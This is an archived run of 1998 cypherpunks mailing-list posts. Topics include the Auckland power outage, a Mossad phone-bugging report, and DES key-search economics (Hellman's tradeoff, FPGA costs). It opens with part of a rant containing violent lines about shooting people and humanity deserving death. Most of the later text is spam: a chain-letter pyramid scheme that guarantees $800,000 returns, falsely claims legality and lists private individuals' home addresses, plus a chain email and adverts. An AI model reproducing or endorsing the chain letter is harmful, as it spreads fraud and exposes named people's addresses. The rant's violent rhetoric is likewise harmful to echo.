digitally structured reality that is being forced upon
humanity by the new technology being promoted by the
pawns of the reptilian Nazis whose headquarters is deep
within the confines of the AdamAntarctic is: "Whose brain
do I put my first bullet through?"

  For many, the answer will be, "TruthMonger!"
  Nobody likes to hear the truth, and the truth is: We
all deserve to die.
  Not only that, but the extinction of humanity, according
to our current values, epitomizes the crowning glory of
our evolutionary path.

  What places us *above* the other primates and the other
forms of life on our planet? What is it that makes us
special, that deems us worthy of ruling over all other
life forms on the planet Earth?
  It is our ability to control; our ability to master
our environment and the objects and life(c)forms contained
within its bounds. Ultimately, it is our ability to *kill*
whatever stands in the way of the fulfillment of our desires
and our goals.
  For all of our soul(c)searching, spiritual posturing, deep
down inside we all know that we live in a predatorial 
universe. Republicans cry out for bigger guns to defend
our way of life from everyone who fails to salute the flag.
Democrats cry out for the press and political leaders to
invent enemies to justify the liberals crying out for
bigger guns to protect us from the 'bad guys.'
  And it's all bullshit...

  The reason we need to launch wars and destroy our
environment is to keep the price of our refrigerators
and our color TV's reasonable(c)(c)to keep the price of aj
dollar high enough that we can feel good about ourselves
for saving a starving child for less than ten cents a day,
while ignoring the fact that an obese Sally Fields could
save more starving children in a week than we possibly 
could in a lifetime, just by donating one of her lunches
to the charity she is promoting.


Think About This, You Stupid Fucking Bastards:
  Why do we need to allow our basic human rights and
freedoms to be compromised?: In order for our hallowed
leaders and our protectors in the law enforcement
community to adequately protect us from the 'bad guys.'
  Why do we need to be protected from the 'bad guys'?:
Because if they win out over the 'good guys', they 
will take away our basic human rights and freedoms.


The Reason TruthMonger Will Die Broke And Alone:
  Because he invested all of his money in ClueServers,
believing that the Sheeple might one day find them
to be of value.

"TV Is Real! (Just go back to sleep, dear.)"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 26 Feb 1998 09:33:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: From Peter Gutmann  Re: So what *does* happen to a city without power
Message-ID: <3.0.5.32.19980226093420.007dd2d0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



I wrote: 
> 
>>A part of Aukland is finding out.
>>
>>http://www.tampabayonline.net/news/news101l.htm

Peter G replies: 
>It's pretty serious, so far it's affected (at various times) a number of 
>banking data centres (the first day the power went out was on the Thursday 
>when everyones pay is supposed to be processed - the data centres themselves 
>have generators, but the sources feeding them information don't), the stock 
>exchange, some (unidentified) central city post office buildings, customs
and 
>immigration, inland revenue, internal affairs, social welfare, the Auckland 
>City Council, the central police station, Aucklands main hospital and
medical 
>school complex (they have generators, but one of them failed, leaving the 
>childrens hospital without power for awhile), the city campus of the 
>university and technical institute (affecting 30,000 students in the
middle of 
>enrolment), several TV and radio stations, and God knows what else (the 
>government departments have tentacles all over the city, so it's not so bad 
>for them).  Although many of these places have generators, there were
various 
>glitches in switching over and one or two breakdowns which have caused 
>problems, and most of the generators can't handle anywhere near the load
being 
>placed on them but were designed to power only essential services.  One 
>comment I've heard is that the power company may not survive the lawsuits 
>which follow this (taking out some suburb is serious enough, but taking out 
>the central business district with its cluster of multinational accounting
and 
>legal firms, banks, government departments, and whatnot is really bad).
> 
>There's fairly detailed coverage of what's going on at 
>http://www.cs.auckland.ac.nz/~pgut001/pubs/power.txt, with a temporary
copy at 
>http://www.kcbbs.gen.nz/users/peterg/power.txt (the Auckland site doesn't
have 
>power at the moment, the other one is located outside the city centre, I'll 
>move things to the first site once power is restored).
> 
>Peter (usually pgut001@cs.auckland.ac.nz when we have power).
>
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

 The Internet Protocol's only guarantee is that your packets will not clog
the net.






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 26 Feb 1998 11:01:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: bugging the swiss
Message-ID: <3.0.5.32.19980226100004.0079cb10@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


	
Mossad was busted for bugging Swiss telephones today.

http://www.newsday.com/ap/rnmpne0j.htm

Swiss Claim Israelis Were Spying

                     By IRENE HARNISCHBERG Associated Press Writer

                     BERN, Switzerland (AP) -- Switzerland said today it
had caught Israel's spy agency in an attempt to bug
                     telephones on the outskirts of the Swiss capital. It
was the third highly publicized Mossad bungle to
                     embarrass the Israeli government in recent months, and
angered Swiss leaders.

                     ``The least Israel can do is apologize quickly,'' said
spokesman Franz Egle of the Swiss Foreign Ministry,
                     which formally protested the alleged bugging attempt
as a violation of national sovereignty.

                     Israel radio said the Israeli agents were trying to
eavesdrop on Iranian diplomats, but Swiss officials denied
                     the report, saying the targets were neither Iranian
nor diplomats.

......
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

 The Internet Protocol's only guarantee is that your packets will not clog
the net.






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Thu, 26 Feb 1998 10:29:16 -0800 (PST)
To: nugget@slacker.com
Subject: DES search
Message-ID: <Pine.SOL.3.95.980226132743.23307C-100000@topdog.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Why doesn't someone speed up the DES search with Hellman's
time-space tradeoff, whose precomputation could be done within
a month?

Alan T. Sherman
sherman@cs.umbc.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 26 Feb 1998 13:55:23 -0800 (PST)
To: "Charles" <cypherpunks@toad.com
Subject: Re: From Peter Gutmann  Re: So what *does* happen to a city  wit
In-Reply-To: <3.0.5.32.19980226093420.007dd2d0@otc.net>
Message-ID: <3.0.5.32.19980226134354.007ef100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:26 AM 2/27/98 +1000, Charles wrote:
>
 The government claimed that all 4 of
>our power stations (insert particular fault of the day...I heard
>boilers blowing up, pipes getting clogged etc) had an incredibly
>unlucky act of god perpetrated on them all at the exact same time

Several extremely unlikely faults at the same time is what
often causes the great disasters (e.g., Three mi. is.), as is
well-documented in the
comp.risks arena.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

 The Internet Protocol's only guarantee is that your packets will not clog
the net.






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Thu, 26 Feb 1998 13:02:21 -0800 (PST)
To: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Subject: Re: DES search
In-Reply-To: <Pine.SOL.3.95.980226132743.23307C-100000@topdog.cs.umbc.edu>
Message-ID: <Pine.LNX.3.95.980226143809.3553E-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Feb 1998, Dr. Alan Sherman wrote:

> Why doesn't someone speed up the DES search with Hellman's
> time-space tradeoff, whose precomputation could be done within
> a month?

Probably because finding spare CPU cycles on thousands of machines is
easy and free, while finding the disk storage space that you mention
would be expensive, and I doubt distributed.net has the resources.
And people who do have the resources are busy doing other things with
them, or keep them at Fort Meade.

I forget because I haven't read that part of Applied Crypto in a while,
but wasn't it terabytes of storage?

-- 
 Andrew Fabbro [afabbro@umich.edu] [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/      313.647.2713 
   "When in Bologna will a Fabbro rise again?" --Dante





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 26 Feb 1998 13:08:43 -0800 (PST)
Subject: DES, MMX, and FPGAs
Message-ID: <6B5344C210C7D011835C0000F8012766010035E1@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain





In DES key search, the speed of a given machine is controlled by three
main factors: clock speed, the algorithm used, and the availability of
multiple issue (the last refers to perfoming 2 or more instructions in
parallel).

Clock speed can be easily factored out for comparison purposes.
Algorithm is harder; a bitslice algorithm is a clear win on 64 bit
machines with lots of registers, but is roughly equivalent to
non-bitslice algorithms on 32 bit machines with a low register 
count (eg, Intel processors, even using MMX).

Multiple issue can greatly speed up a specificly tuned assembly
language version. I can't speak for the non-intel processors below,
but the Pentium code below is all tuned for the vanilla Pentium, and
does not get a boost from the PPro or P2. 

Let's do the numbers:

d.net peak keys per second: 34,430,460,000

cpk (clocks per key) = (equiv * clock speed)/34B

Processor		clock (MHz)	equiv	cpk
DEC Alpha 321064				 142	(4)
DEC Alpha 21066					 220	(4)
DEC Alpha 21064		533		11,264 	 176	(1)
DEC Alpha 21164 (Deschall)			  94	(3)
Sun Ultra I		167		15,316	  75	(1)
SGI r10k					  69	(4)
Macintosh PowerPC 604e  200		68,859	 403	(1)(2)
Macintosh PowerPC 604e  200		         137	(4)
Intel Pentium II        333		22,393   219	(1)(6)
Intel Pentium Pro				 232	(4)(6)
Intel Pentium           166		41,712   203	(1)
Intal Pentium (Bryddes)				 195	(5)
Intel 486DX2		 66	       399,374   775	(1)
Intel 386SX		 20	     7,446,033  4380	(1)

(1) D.net press release.

(2) This figure comes from the press release. I don't believe it 
for a moment. The next line gives a speed determined from a 
posting to the d.net mailing list, and is much more believable - 
if anything, it appears a little slow.

(3) Deschall client

(4) based on d.net mailing list posting.

(5) Sven Mikkelsen's page.

(6) I'm not aware of any fielded bitslice software for Intel MMX
platforms. I suspect that it would not speed things up too much - 
there are simply too few registers, and you'd spend a lot of time
moving stuff in and out of cache. 

I wouldn't be suprised if some of the figures above are incorrect,
but it's clear that the best processors are getting down to 70-100
clock cycles per key. 

Wiener's keysearch engine unrolls the 16 rounds of DES, and is thus
able to run in a similar way to an assembly line; once it's 'filled
up' it tests 1 key per clock cycle. Any other version would run a 
lot slower. 

Some highly uninformed blather about FPGAs follows:

Wiener's paper uses custom VLSI chips, and claims a need for
26k "gates" or 78257 "sites". I'm not sure how this translates to
silicon requirements in FPGAs - it seems that "gate" and "site" are
nominal terms which are not directly equivalent to actual, physical
gates. I've found one reference to a general DES FPGA implementation
which requires 25k gates, though it's not clear if this reuses the
round circuitry, or 'unrolls' it (I suspect the latter, which would
be good).

I'm also not certain if a FPGA running at, for example, 50 MHz, can
actually run logic operations at that speed. Some things I've read
suggest that FPGAs run ops at several clocks per operation - which
is still a lot better than a general purpose microprocessor.

The fastest and largest FPGAs I'm aware of are the Xilinx 4000
series: The xc40125 has about 80,000 gates, and runs at around
100 MHz (and costs $1500!!). 

Suppose we use this chip, and everything works out optimally. We
can fit 3 des engines per chip, and get 300 Mkeys/sec checked. To
duplicate d.net's speed, we would need about 115 chips, or about
$170k for the chips alone. 

A better choice would be the Xilinx Spartan XL series. This might be
in the $20 - $40 a chip, and would run at 80MHz, and would fit only
one des engine. This would be around $9k - $17k, which is still 
pretty high for an individual. 

At this speed (34Gkey/sec), it would still take 12 days to search
half the keyspace, and the prices quoted are for the chip alone, no
boards, chassies, or SW, and the speeds are assumed to be 
1 key/engine/clock, which is optomistic.

On the plus side, implementing a DES cracker in an FPGA actually
affords us some efficiency savings over a non-reconfigurable chip. The
cipher and plaintexts can be compiled into the design, and if you're
willing to reload the chip frequently, the slower-changing portions of
the key can be built in as well. This cuts the gate count
considerably.

I'd really like to see the next DES challenge taken on by some
organization with a few hundred under utilized FPGA boards.

Peter Trei
ptrei@securitydynamics.com













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vcarlos35@juno.com
Date: Thu, 26 Feb 1998 13:57:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: DES search
In-Reply-To: <Pine.LNX.3.95.980226143809.3553E-100000@brokenarrow.us.itd.umich.edu>
Message-ID: <19980226.163857.9662.0.vcarlos35@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


A few terabytes of storage isn't THAT expensive.
Let's see:
1,000,000,000,000 bytes
a CDROM holds about 640 MB, which means that 1563 CDs could hold it.
At CompUSA, that were recently selling recordable CD's for $10 for five,
but
with a mail-in $10 rebate which means you're only paying 32 cents for
postage
for 5 CD's. .32*1563=$500 or so.
Add in the cost of a few CD-R drives @ $300 each = $900 for recording.
Combined total=$1400
Within the reach of distributed.net, I would think.

On Thu, 26 Feb 1998 16:01:55 -0500 (EST) andrew fabbro
<afabbro@umich.edu> writes:
>On Thu, 26 Feb 1998, Dr. Alan Sherman wrote:
>
>> Why doesn't someone speed up the DES search with Hellman's
>> time-space tradeoff, whose precomputation could be done within
>> a month?
>
>Probably because finding spare CPU cycles on thousands of machines is
>easy and free, while finding the disk storage space that you mention
>would be expensive, and I doubt distributed.net has the resources.
>And people who do have the resources are busy doing other things with
>them, or keep them at Fort Meade.
>
>I forget because I haven't read that part of Applied Crypto in a 
>while,
>but wasn't it terabytes of storage?
>

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Elder <melder@descartes.coker.edu>
Date: Thu, 26 Feb 1998 14:32:43 -0800 (PST)
To: "Charles" <bear@gargoyle.apana.org.au>
Subject: Re: From Peter Gutmann  Re: So what *does* happen to a city  wit
In-Reply-To: <3.0.5.32.19980226093420.007dd2d0@otc.net>
Message-ID: <3.0.5.32.19980226172749.007bb470@descartes.coker.edu>
MIME-Version: 1.0
Content-Type: text/plain



	In the New York Times yesterday there was an article about a hacker "game"
where the pentagon said that most unclassified computers were breeched, and
supposedly none of the classified ones were hit, according to the
spokesman. I don't know how much validity my idea has, probably very
little, but if there was a "contest" going on like the article implied,
perhaps it wasn't limited to government computers. AOL went down recently,
along with alot of other power outages, if some computers had been
breeched, how difficult would it have been for someone to cause something
to overload and cause a power outage? But then again, perhaps I have a
vivid imagination.

PS: The article from the NY Times could probably still be accessed from the
archive there at www.nytimes.com

-E.

At 05:26 AM 2/27/98 +1000, Charles wrote:
>On 26 Feb 98 at 9:34, David Honig wrote:
>
>> I wrote: 
>> > 
>> >>A part of Aukland is finding out.
>> >>
>> >>http://www.tampabayonline.net/news/news101l.htm
>> 
>> Peter G replies: 
>> >It's pretty serious, so far it's affected (at various times) a number of 
>
>Strangely enough (Auckland is just a 3 hour flight ESE of here) at
>almost the same time Aucklands power went down Brisbane in
>Queensland Australia had its own power problems from last Sunday
>through to approx Thursday. Our situation was nowhere near as bad as
>Aucklands but it was unusual. The government claimed that all 4 of
>our power stations (insert particular fault of the day...I heard
>boilers blowing up, pipes getting clogged etc) had an incredibly
>unlucky act of god perpetrated on them all at the exact same time
>resulting in controlled blackouts to SE Queensland and Brisbane
>(excepting the CBD which was not subject to power rationing). The
>minister responible claims that it was not due to lack of
>maintenance (which would be my guess) but just a one in a billion
>chance. I guess we don't have a national power grid here to draw on
>during such times.
>
>If anyone has found out what really happened here I'd love to know as 
>the pollies usual lies are getting so bad its embaressing.
>
>-- 
>   .////.   .//    Charles Senescall           bear@gargoyle.apana.org.au
> o:::::::::///                                   apache@bear.apana.org.au
>>::::::::::\\\     Finger me for PGP PUBKEY            Brisbane AUSTRALIA
>   '\\\\\'   \\    Apache
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdshea@20315.com
Date: Thu, 26 Feb 1998 19:43:42 -0800 (PST)
To: 29431@blue.net
Subject: This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
Message-ID: <125>
MIME-Version: 1.0
Content-Type: text/plain



This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
THIS CAN BE YOUR BEST OF DREAMS! TRY IT!



THIS MAY BE THE MOST SIGNIFICANT LETTER 
                                      YOU WILL RECEIVE THIS YEAR!!
-----------------------------------------------------------------------
***Please,... Follow The Instructions Of This  Letter Very Carefully.       Immediately Make  A Copy,  And Read It Twice.*** 

Subject: It's Only a Game, But You Win Big Money!

Greetings, 

Hopefully my name is still on the list below. I am a retired
attorney, and about two years ago a man came to me with a letter. The
letter he brought me is basically the same as the letter in front of you
now. He asked me to verify the fact that this letter was legal. I told him
that I would review it and get back to him. When I first read the letter I
thought it was some off-the-wall idea to make money. A week later I
met again with my client to discuss the issue. I told him that the letter 
originally brought to me was not 100% legal. My client asked me to
alter the letter to make it 100% legal. I advised him to make a small 
change in the letter and it would be alright.
I was curious about the letter, so he told me how it works. I thought it
was a long shot, so I decided against participating. Before my client
left, I asked him to keep me updated as to his results. About two 
months later he called to tell me that he had received over $800,000
in cash! I didn't believe him so he asked me to try the plan and see 
for myself. I thought about it for a couple of days and decided that 
there was not much to lose. I followed the instructions exactly and 
mailed out 200 letters. Sure enough, the money started coming! 
It came slowly at first, but after three weeks I was getting more 
than I could open in a day. After about three months the money 
stopped coming. I kept a precise record of my earnings and at the
end it totaled $868,439.00.

I was earning a good living as a lawyer, but as anyone in the legal
profession will tell you, there is a lot of stress that comes with the
job. I told myself if things worked out I would retire from practice and
play golf. I decided to try the letter again, but this time I sent 500
letters out. Well, three months later I had totaled $2,344,178.00!!! I
just couldn't believe it. I met my old client for lunch to find out how
this exactly works. He told me that there were a few similar letters 
going around. What made this one different is the fact that there are
six names on the letter, not five like most others. That fact alone
resulted in far more returns. The other factor was the advice I gave
him in making sure the whole thing was perfectly legal, since no one
wants to risk doing anything illegal.
                               
I bet by now you are curious about what little change I told him to
make. Well, if you send a letter like this out, to be legal, you must sell
something if you expect to receive a dollar. I told him that anyone
sending a dollar out must receive something in return. So when you 
send a dollar to each of the six names on the list, you must include a 
slip of paper saying, "Please put me on your mailing list" and include 
your name, mailing address, and email address. (Your phone # is optional).
This is the key to the program! The item you will receive for a dollar you 
send to the six names below, is this letter and the right to earn thousands. 
We will be working together to improve each others lives!

Follow the simple instructions below exactly, and in less than three
months you will receive over $800,000.00 GUARANTEED!!!!!!

A)  Immediately send $1.00 to each of the six people on the list below.
Wrap the dollar in a note (type written or handwritten) saying
"Please add me to your mailing list" and include your name, 
mailing address, and email address. Your phone number is optional:

1) Anthony Thomas  8150 East Hildale St.  Detroit, MI  48234
2) Phillip Smith  24321 Sunnypointe  Southfield, MI  48034
3) Claudia Stephan PO Box 1819 Carmichael, CA 95609
4) Nadia Segun PO Box 1357 Rancho Cordova, CA 95741
5) Lidia Zoring  3500 Data dr. # 147 Rancho Cordova, CA 95670
6) James Thomas 11329 S Peoria St. Chicago, IL 60643


B) Remove the name next to #1 on the list and move the rest of the names
up one position. Then place your name in the #6 spot. This is best done by
typing a new list and taping or gluing it over the old one. Or by saving
this to a text file and editing it yourself and saving the new edited 
copy.

C) When you have completed the above instructions, you have an option
of mailing your new letter out in two ways: 1) Through the U.S. Postal
Service or 2) through e-mail. This letter has been proven perfectly legal
for both ways as long as you follow the above instructions, because you're
purchasing membership in an exclusive mailing list . To mail this 
out over the internet, you can browse through areas and find people to 
send  this to all the time. All you have to do is cut and paste email addresses 
wherever you are on the Internet. Remember, it doesn't cost anything to 
mail on the Internet. Or you can get a Mass Mail Network to mail it
out in large volumes for you.                         

2


One that we recommend is:
Cyber Mail ($15 / 200 names) ($25 / 500 names) ($50 / 1,500 names) 
16500 North Park Dr.
Suite 413
Southfield, MI  48075
(248) 557-7778

Either way will bring big payoffs. If you 
are going to use the traditional U.S. Postal Service to do this program, 
you will want to order a minimum 200 names from a mailing list company. 
Two that have been most effective for these lists are: 

***Be sure to ask for "Opportunity Seekers" and request a list less
      than 30 days old***

S.E. Ring Mailing List ($26 / 200 names)
P.O Box 15061
Ft. Lauderdale, FL 33318 (954) 742-9519

Advon Distributors ($28 / 200 names)
P.O. Box B-11
Shelly, ID 83274 (800) 992-3866

***Keep in mind- there is no limit to the amount of names you can send 
      out.  The more names you send, the more money you'll make.
      We strongly encourage you to mail this letter to family, friends and 
      relatives as well.*** 
     

D) When your mailing list arrives, place one label on a stamped
envelope and drop it in the mail box (Be sure to send out at least 200). 
Within 90 days, you will receive over $800,000. 

E)  Keep a copy of this letter and all the names you receive. Mail it out 
again in about 6 months. But mail it to the addresses you received with 
each dollar. It will work again, only much better.

THIS IS A SERVICE AND IS 100% LEGAL !
(Refer to title 18, Section 1302 & 1342 of the U.S. Postal and Lottery 
Laws)

3                                                           
                                                          

Assume for example you get a 7.5% return rate, which is very conservative.
My first attempt was about 9.5% and my second time was over 11%.

1) When you mail out 200 letters, 15 people will send you $1.00.
2) Those 15 mail out 200 letters, and 225 people will send you $1.00
3) Those 225 mail out 200 letters, and 3,375 people will send you $1.00
4) Those 3,375 mail out 200 letters, and 50,625 people will send you $1.00
5) Those 50,625 mail out 200 letters, and 759,375 people will send you $1.00 

At this point your name drops off the list,
but so far you have received $813,615.00!!!!!

It works every time, but how well depends on how many letters you send
out. In the example above, you mailed out 200 letters, if you mailed out 500
letters, you would have received $2,006,917!! Check the math yourself,
I want you to, but I guarantee it is correct! With this kind of return,
you've got to try it. Try it once and you will do it again!!!

Just make sure you send a dollar to each of the six names on the list with
a note to be added to their mailing list. Together we will all prosper!!!!

PS  You've read this far, so let me ask you one simple question:

Q.                      What do you have to lose??
A.                       Only $ 6.00 

What you can gain is an income, like the example in this letter.
Small Risk, Small Expense, HUGE Potential Return!!!
What do you have to loose?
I invite you to join our mailing list today!!!

Don't throw this away. Keep it, think about it, and in several months you will try it!


I looked at it for over two months and then I said "it's only $6" I have to be nuts not to try it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Thu, 26 Feb 1998 20:18:49 -0800 (PST)
To: Yankee1428@aol.com
Subject: Fwd: Paint War
Message-ID: <19980227041810.1449.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



remember...................
You Can't Get Someone Whos Already Shot You!!!!!!!!!!
ssssSPLATTTT!!!!   SHMUSH
   *    **     * *  *   *   *   *   *
     *    *   *   *  *  *    *   *
   *     *   *    *     *      *   *    *     *        *
hehe...couldn't resist!!!  
(Hey, wipe the paint off the side of your head...LOL)  :-)


RUMMOR HAS IT THAT THIS IS A PAINT WAR........AND YOU HAVE BEEN
SPLATTED..........SO.......TEE HEE......I GOT YOU FIRST !!!!!
TEE HEE HEEE........NEENER NEENER NEENER.....YOU HAVE BEEN
PAINT SPLATTERED !!!!!!!!!


     You Are Now Officially Involved In
    "Paint War '98"
  
  You Have taken A Severe Shot To The Head.  You must Get As Many People
As
You Possibly Can.


------------
Fixed by Perrin
pleontks@Hotmail.com
http://members.tripod.com/~pleontks
http://www.angelfire.com/az/69frank69

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sara.a.james@usa.net
Date: Thu, 26 Feb 1998 22:35:41 -0800 (PST)
To: WantFree@software4.you.ca
Subject: suggestion
Message-ID: <011297055501222@e-bizness.com>
MIME-Version: 1.0
Content-Type: text/plain






Visit http:www.sface.com

for free software

Sara James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sample@whynot.net
Date: Thu, 26 Feb 1998 17:43:32 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Auction
Message-ID: <3168726_40397477>
MIME-Version: 1.0
Content-Type: text/plain



This weeks specials at http://www.wildauction.com

All products start at just $1, Higher quantities, low prices!
All auctions close Monday at 10pm Eastern time, International orders welcome.

230 Watt AT Power Supply starting at $1!
S3 ViRGE/DX 3D PCI 4MB Video Accelerator starting at $1!
Datamax P233MMX Multimedia Notebook Debonair starting at $1!
230 watt power supply starting at $1!
Microsoft Windows NT Workstation 4.0 starting at $1!
3.5" Floppy Disk Drive starting at $1!
The Datamax P233MMX Multimedia Reaper starting at $1!
Designer Mid-Tower Case starting at $1!
Microsoft Office 97 Professional 20-Pack starting at $1!
Acer 24x E-IDE CD-Rom Drive starting at $1!
Rockwell 56Kflex Internal Data/Fax/Voice Modem starting at $1!
Intel Pentium II 300MHz Processor starting at $1!
Shuttle Hot255 PCI Wavetable Sound Card starting at $1!
Rockwell 33.6 Internal Data/Fax/Voice Modem starting at $1!
AcerScan 610 Plus Color Flatbed Scanner starting at $1!
8x32 32MB EDO RAM chip starting at $1!
Datamax P233 MMX Multimedia Notebook Excelsior starting at $1!
33.6 Modems (Out of box Special) starting at $1!
Intel Pentium 233MMX Cpu with Fan/Heatsink starting at $1!
Windows 95 OSR2.1 w/ certificate and manual starting at $1!
AcerScan Prisa 310P Scanner starting at $1!
2 x 64 32MB SDRAM chip starting at $1!
Maxtech 1726 17" SVGA Monitor starting at $1!
3 Button 9-pin serial Mouse starting at $1!
Encore 8 port 10Base-T Hub starting at $1!
MGC 1765BA 17" SVGA Monitor starting at $1!
4x32 16MB EDO RAM starting at $1!
MGC 1569 15" Monitor starting at $1!
Datamax Pentium II 300 MHz Multimedia Killer starting at $1!
S3 Trio 64 1MB PCI Video Card starting at $1!
70 Watt Power Amplified Speakers starting at $1!
Microsoft Office Pro 97 starting at $1!
Amptron TXPro Motherboard starting at $1!
Fujitsu 4.3 UltraDMA Hard Drive starting at $1!
Amptron Pentium MMX TX Motherboard starting at $1!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Thu, 26 Feb 1998 20:48:31 -0800 (PST)
To: vcarlos35@juno.com
Subject: Re: DES search
In-Reply-To: <19980226.163857.9662.0.vcarlos35@juno.com>
Message-ID: <Pine.LNX.3.96.980227024202.26509B-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Feb 1998 vcarlos35@juno.com wrote:

> a CDROM holds about 640 MB, which means that 1563 CDs could hold it.
> At CompUSA, that were recently selling recordable CD's for $10 for five,
> but
> with a mail-in $10 rebate which means you're only paying 32 cents for
> postage
> for 5 CD's. .32*1563=$500 or so.
> Add in the cost of a few CD-R drives @ $300 each = $900 for recording.
> Combined total=$1400
Yes, but then you have to be able to read them all too. :) I'm not up on
CD changers, but how much would sufficient changers cost to read from
those 1500+ CDs? (Remember, we only need to read 1560 of 'em since the
CDRs can double as readers... :)

Maybe when DVD-ROM gets out there, and somewhat affordable, but not with
CDs (IMHO OC).

dave



----- David E. Smith, P O Box 324, Cape Girardeau MO 63702
http://bureau42.base.org/people/dave/ dave@bureau42.ml.org

"Quite simply, I'm telling you to GROW UP." -- Dunkelzahn's will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmp@iddqd.org (Concrete Maintenance Products)
Date: Fri, 27 Feb 1998 04:17:29 -0800 (PST)
To: cmp@iddqd.org
Subject: 260298 Concrete Protection & Resurfacing
Message-ID: <199802272451HAA17084@post.intercable.net>
MIME-Version: 1.0
Content-Type: text/plain


 ===========================================================
  MYTH:
 Concrete will last forever with no protection or maintenance.
 
 FACT: Deterioration starts quietly and instantly. The time to protect
 against costly deterioration is before it begins. 
 ===========================================================
 
 ------------------------------
      CONTENTS
 ------------------------------
 
 1. Protect Concrete
     a. Concrete Conditioner
 2. Repair and/or Resurface Concrete
 3. CMP Web Site
     a. Tour our Web Site

 --------------------------------------
  1. Protect Concrete
 --------------------------------------
 
 When you consider all the elements and wear your concrete is exposed
 to:
 
 ALWAYS BEING RUN OVER
 STEPPED ON AND
 DUMPED ON 
 
 Water, harmful chemicals and abrasion all take their toll on your
 concrete. With all this abuse is it any wonder that concrete does not
 have the long life and good appearance it should have

 -------------------------------------------------------
  1a. THE CONCRETE CONDITIONER
 -------------------------------------------------------
 
*****NOW AVAILABLE TO THE HOMEOWNER*****
 
 Now you can do something to protect your concrete. The Concrete
 Conditioner has been available for commercial and industral use and is
 now available to the home owner.

 *****A Preventive Care Product*****
 
 The conditioner is a liquid treatment that seals your concrete from
 the inside out and makes it dense.  More importantly it transforms the
 surface from a soft limestone to a harder flint like surface.  After
 treatment your concrete is protected from water, salts, harmful
 chemicals and wear.
 
*****DO IT YOUR-SELF*****
 
 The conditioner is safe, easy to use and BEST of all it works.  We 
 have simple do-it-yourself directions.
 
 It's also affordable. It is possible to do your garage floor or drive
 way for less than $100.  When you consider the high cost of
 replacement---every home has $5,000 - $10,000. or more of concrete. 
 Conditioning your concrete is one of the best investments you can
 make. 
 
 >DON'T WAIT TILL YOU SEE WEAR, DAMAGE OR DETERIORATION.
 
 >MAKE PLANS TO TREAT YOUR NEW CONCRETE THE DAY IT IS POURED.  
 
 >CONCRETE OF ANY AGE WILL BENEFIT. 
 
 >STOP OR SLOW DETERIORATION THAT HAS ALREADY STARTED.
 
 -------------------------------------------------------------------------
  2. REPAIR and/or RESURFACECONCRETE
 -------------------------------------------------------------------------

We can provide you with quality surface restoration and protection materials to:
>Clean Concrete
>Repair Cracks
>Patch Concrete
>Resurface Concrete

To make old, cracked, deteriorating surfaces better than new!

*****AT A FRACTION OF THE COST OF REPLACEMENT*****

----------------------------------------------------
  VISIT OUT WEB SITE FOR 
       MORE INFORMATION 
----------------------------------------------------
 
TAKE A BRIEF TOUR OF OUR WEB SITE 
1st Stop -- About Concrete
**A MUST FOR FIRST TIME VISITORS**
Click Here
http://world-space.ids.on.ca/users/cmp/tour/

LEARN HOW TO PREVENT CONCRETE DETERIORATION
Click Here
http://world-space.ids.on.ca/users/cmp/conditioning/prevent.htm

LEARN MORE ABOUT CONCRETE CONDITIONING
Click Here
http://world-space.ids.on.ca/users/cmp/conditioning/conditioning.htm

LEARN MORE ABOUT REPAIRS AND RESURFACING
Click Here
http://world-space.ids.on.ca/users/cmp/randr.htm

 ---------------------------------------------------------------------
     REMOVE ME FROM YOUR LIST NOW
 ---------------------------------------------------------------------
 To be REMOVED from our list send an email to cmpremove@iddqd.org by:
CLICKING HERE
 
*********************************************************************
Concrete Maintenance Products
169 James Avenue
Minneapolis MN  55405





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
